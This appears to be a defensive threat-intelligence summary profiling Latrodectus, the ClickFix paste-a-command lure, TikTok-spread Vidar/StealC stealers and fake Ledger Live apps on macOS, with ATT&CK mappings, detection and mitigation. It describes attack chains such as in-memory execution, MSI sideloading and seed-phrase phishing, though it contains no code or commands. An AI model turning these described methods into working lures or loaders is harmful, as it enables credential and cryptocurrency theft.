Full Report
The malware known as Latrodectus has become the latest to embrace the widely-used social engineering technique called ClickFix as a distribution vector. "The ClickFix technique is particularly risky because it allows the malware to execute in memory rather than being written to disk," Expel said in a report shared with The Hacker News. "This removes many opportunities for browsers or security
Analysis Summary
# Tool/Technique: Latrodectus
## Overview
Latrodectus is a malware family primarily functioning as a downloader for subsequent malicious payloads, such as ransomware. It gained attention for utilizing the "ClickFix" social engineering technique for distribution, which often involves in-memory execution to evade disk-based detection.
## Technical Details
- Type: Malware family
- Platform: Windows (Inferred, based on use of PowerShell and MSIExec)
- Capabilities: Payload delivery, in-memory execution, uses legitimate installer sideloading.
- First Seen: April 2024 (documented by Proofpoint and Team Cymru)
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1566 - Phishing
- T1566.004 - Phishing: Spearphishing Link (Used via infected websites tricking users into running commands)
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter
- T1059.001 - Command and Scripting Interpreter: PowerShell
- TA0005 - Defense Evasion
- T1218 - Signed Binary Proxy Execution
- T1218.011 - Signed Binary Proxy Execution: Msiexec
## Functionality
### Core Capabilities
- Acts as a downloader for more significant malware like ransomware.
- Leverages the ClickFix social engineering technique.
- Instructs users, often via infected websites, to copy and execute a malicious PowerShell command.
- Attempts to install a file remotely using `MSIExec`.
- Executes the installed file/payload directly in memory to avoid writing it to disk.
### Advanced Features
- Uses a legitimate NVIDIA MSI installer packaged within the malware to sideload a malicious DLL.
- Downloads the main payload using `curl` after initial execution.
## Indicators of Compromise
- File Hashes: N/A (Not explicitly provided in the context)
- File Names: N/A (Not explicitly provided in the context)
- Registry Keys: Mitigation involves registry changes to disable Win+R hotkey.
- Network Indicators: N/A (Specific C2 indicators defanged or not provided)
- Behavioral Indicators: Execution of arbitrary PowerShell command copied from a webpage; use of `MSIExec` to stage a dropper; subsequent use of `curl` for external download.
## Associated Threat Actors
- Associated with actors impacted by Operation Endgame, which also targeted QakBot, TrickBot, Bumblebee, HijackLoader, and DanaBot. (Specific named actor affiliation not given, only association through Operation Endgame takedown.)
## Detection Methods
- Signature-based detection: Historically susceptible due to disk activity, but in-memory evasion is a key challenge.
- Behavioral detection: Detecting mass execution of PowerShell commands initiated manually by users via web instructions (ClickFix behavior). Monitoring for execution chains involving `MSIExec` sideloading a DLL.
- YARA rules: N/A
## Mitigation Strategies
- Disable the Windows Run program using Group Policy Objects (GPOs).
- Disable the "Windows + R" hot key via a Windows Registry change.
- Enhanced endpoint protection capable of monitoring and blocking malicious PowerShell execution chains, even when initiated by a user.
## Related Tools/Techniques
- ClickFix (Social engineering distribution technique)
- IcedID (Latrodectus is believed to be a successor)
- MSIExec (Used for sideloading/initial installation)
---
# Tool/Technique: ClickFix Technique (Social Engineering Vector)
## Overview
The ClickFix technique involves deceiving users into manually copying and executing specific commands (often PowerShell commands) presented on a compromised website. Its primary risk lies in facilitating in-memory execution, bypassing traditional disk-based security checks.
## Technical Details
- Type: Technique
- Platform: General (Platform dependent on the command executed, primarily Windows observed here)
- Capabilities: Social engineering, initial access, facilitating in-memory execution, evading disk-based security, often used with video guidance (e.g., TikTok).
- First Seen: In widespread use in scenarios involving malware stages like Latrodectus.
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1566 - Phishing
- T1566.004 - Phishing: Spearphishing Link (When presented via a website instruction)
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter (Specifically PowerShell execution)
## Functionality
### Core Capabilities
- Tricking users via visual/textual cues (sometimes in videos) to manually open the Windows Run dialog (`Win+R`).
- Guiding users to launch PowerShell and paste/execute a malicious command.
- High success rate due to user intervention and apparent legitimacy (e.g., pretending to offer software activation).
### Advanced Features
- Escalation observed via using trending social media platforms like TikTok, often with AI-generated narrative content, to guide victims through the process.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: N/A
- Behavioral Indicators: User opening the Run dialog (`Win+R`) followed immediately by launching PowerShell with arbitrary, complex remote command line arguments.
## Associated Threat Actors
- Threat actors distributing Latrodectus.
- Threat actors distributing Vidar and StealC (via the TikTok campaign).
## Detection Methods
- Signature-based detection: Limited, as the initial step is user-intended RDP/Command execution.
- Behavioral detection: Monitoring for the sequence of Win+R -> PowerShell execution with long or obfuscated arguments, especially from non-standard user behaviors.
- YARA rules: N/A
## Mitigation Strategies
- Educating users about the danger of copying and pasting commands from untrusted sources, especially those promising free software activation.
- Disabling the Windows Run program or disabling the "Windows + R" hot key via GPO/Registry edits to disrupt the initial execution step.
## Related Tools/Techniques
- Vidar Infostealer (Distributed via TikTok ClickFix variant)
- StealC Infostealer (Distributed via TikTok ClickFix variant)
---
# Tool/Technique: Vidar / StealC (Information Stealers)
## Overview
Vidar and StealC are information stealer malware families that were recently observed being distributed using a sophisticated social engineering campaign leveraging TikTok videos that instructed victims on how to run malicious commands.
## Technical Details
- Type: Malware family (Information Stealer)
- Platform: Windows (Inferred, based on command execution methods)
- Capabilities: Exfiltrating sensitive data, credentials, and potentially cryptocurrency information from infected systems.
- First Seen: General malware families (Specific campaign first seen recently via this vector).
## MITRE ATT&CK Mapping
- TA0010 - Exfiltration
- T1041 - Exfiltration Over C2 Channel
- TA0009 - Collection
- T1005 - Data from Local System
## Functionality
### Core Capabilities
- Stealing data stored locally on the compromised machine.
- Exfiltrating collected data to attacker-controlled infrastructure.
### Advanced Features
- Distributed via a novel social engineering vector involving popular media platforms (TikTok), often masked as software activation guides.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: N/A
- Behavioral Indicators: Data transmission attempts originating from processes linked to the initial command execution malware.
## Associated Threat Actors
- Threat actors utilizing popular social media (TikTok) for malware distribution leveraging AI-generated content.
## Detection Methods
- Signature-based detection: Standard detection on the infostealer binaries.
- Behavioral detection: Detection focused on the unusual execution chain leading to the deployment of these stealers.
- YARA rules: N/A
## Mitigation Strategies
- Disabling user-directed execution of remote commands via social media.
- Blocking outbound connections from newly spawned processes that should not normally communicate externally.
## Related Tools/Techniques
- ClickFix (Distribution vector used for this campaign)
---
# Tool/Technique: macOS Ledger Stealer Campaigns (AMOS/Odyssey)
## Overview
A series of ongoing campaigns targeting macOS users, specifically those using Ledger cryptocurrency hardware wallets, by tricking them into installing trojanized versions of the Ledger Live application to steal seed phrases and other sensitive data.
## Technical Details
- Type: Malware Campaign (Involving multiple stealers)
- Platform: macOS
- Capabilities: Stealing seed phrases from cryptocurrency wallets, exfiltrating passwords and Apple Notes data.
- First Seen: Ongoing since August 2024.
## MITRE ATT&CK Mapping
- TA0009 - Collection
- T1005 - Data from Local System (Collecting seed phrases, passwords)
- TA0010 - Exfiltration
- T1041 - Exfiltration Over C2 Channel
## Functionality
### Core Capabilities
- Distributing malicious DMG files impersonating Ledger Live.
- Using AppleScript upon launch to exfiltrate existing passwords and Notes data.
- Downloading and launching a trojanized official Ledger Live application.
- Prompting the user within the fake app to enter their recovery seed phrase under the pretense of fixing an account issue.
### Advanced Features
- Use of established macOS stealer malware like Atomic macOS Stealer (AMOS) and Odyssey.
- Overlap observed with campaigns using PyInstaller-packed binaries for deployment.
## Indicators of Compromise
- File Hashes: N/A
- File Names: Malicious DMG files masquerading as Ledger Live installers.
- Registry Keys: N/A (macOS specific)
- Network Indicators: Connections to attacker-controlled servers to receive the seed phrase.
- Behavioral Indicators: Execution of AppleScript to collect local data immediately after launching a suspicious DMG.
## Associated Threat Actors
- Threat actors specializing in cryptocurrency theft targeting Ledger users.
## Detection Methods
- Signature-based detection: Signatures for known AMOS/Odyssey binaries.
- Behavioral detection: Monitoring for AppleScript executing high-privilege data exfiltration paths; analysis of applications requesting cryptographic seed phrases.
- YARA rules: N/A
## Mitigation Strategies
- Only download software from official vendor websites or trusted application stores.
- Never enter seed phrases into any software unless absolutely certain of its legitimacy and context (e.g., initial setup).
## Related Tools/Techniques
- Atomic macOS Stealer (AMOS)
- Odyssey (macOS Stealer)